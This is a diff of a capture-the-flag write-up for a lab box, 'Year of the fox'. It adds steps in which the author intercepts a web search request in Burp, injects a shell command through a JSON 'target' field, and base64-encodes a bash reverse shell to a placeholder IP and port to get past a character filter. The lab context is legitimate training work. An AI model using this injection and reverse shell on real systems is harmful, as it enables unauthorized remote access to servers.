ishXD/CTF-writeups/Year of the fox/writeup.md

 The website:
 ![](https://github.com/ishXD/CTF-writeups/blob/main/Year%20of%20the%20fox/images/Screenshot%202023-07-10%20160130.png)

-Search an empty string and you have 3 files:
+Search an empty string and you can see the expected input is files.
+Also , seems like it doesn't like some characters.

 ![](https://github.com/ishXD/CTF-writeups/blob/main/Year%20of%20the%20fox/images/Screenshot%202023-07-10%20160520.png)

 Intercepting request with Burp:
 ![](https://github.com/ishXD/CTF-writeups/blob/main/Year%20of%20the%20fox/images/Screenshot%202023-07-10%20163302.png)

-For RCE:
+Now , I used intruder to launch a simple SQL injection fuzzing but got nothing.
+So now onto command injection.
+You can run some commands using : `{"target":"\"; COMMAND \""}`
+Used RCE Command : `bash -i >& /dev/tcp/YOUR-IP/PORT 0>&1` but got invalid-character response so used base 64.

 ![](https://github.com/ishXD/CTF-writeups/blob/main/Year%20of%20the%20fox/images/Screenshot%202023-07-10%20194847.png)

-Use burp reppeater:
+Use burp repeater:

 ![](https://github.com/ishXD/CTF-writeups/blob/main/Year%20of%20the%20fox/images/Screenshot%202023-07-10%20194710.png)